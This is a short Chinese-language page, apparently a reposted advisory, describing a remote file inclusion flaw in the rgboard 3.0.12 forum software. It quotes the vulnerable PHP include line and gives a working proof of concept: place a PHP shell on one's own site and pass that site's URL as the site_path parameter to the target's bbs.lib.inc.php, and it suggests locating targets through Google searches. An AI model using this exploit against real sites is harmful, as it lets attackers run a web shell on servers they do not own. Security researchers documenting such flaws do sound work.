页面导航: 首页实用技巧漏洞研究 → 正文内容 rgboard 论坛 漏洞

rgboard 3.0.12 远程文件包含漏洞

发布:dxy 字体:[增加 减小] 类型:转载
Infos: rgboard 3.0.12 远程文件包含漏洞 Author: Flyh4t[w.s.t] rgboard 3.0.12 是韩国的一个论坛程序,可以用google搜索rgboard查看使用的网站
vul code:
\include\bbs.lib.inc.php:
if (!defined('BBS_LIB_INC_INCLUDED')) {
define('BBS_LIB_INC_INCLUDED', 1);
// *– BBS_LIB_INC_INCLUDED START –*
if(!$site_path) $site_path='./';
require_once “{$site_path}include/lib.inc.php”;
//$site_path没有过滤直接放过来包含了
poc:
在你的网站放个phpshell,目录和文件名为/include/lib.inc.php
然后访问
httP://www.target.com/include/bbs.lib.inc.php?site_path=http://yousite/
百度中搜索更多的关于rgboard 3.0.12 远程文件包含漏洞内容,或者用Google搜索相关更多
浏览次数:载入中... 打印本文关闭本文返回首页

文章评论

共有 位脚本之家网友发表了评论我来说两句

同 类 文 章
最 近 更 新
热 点 排 行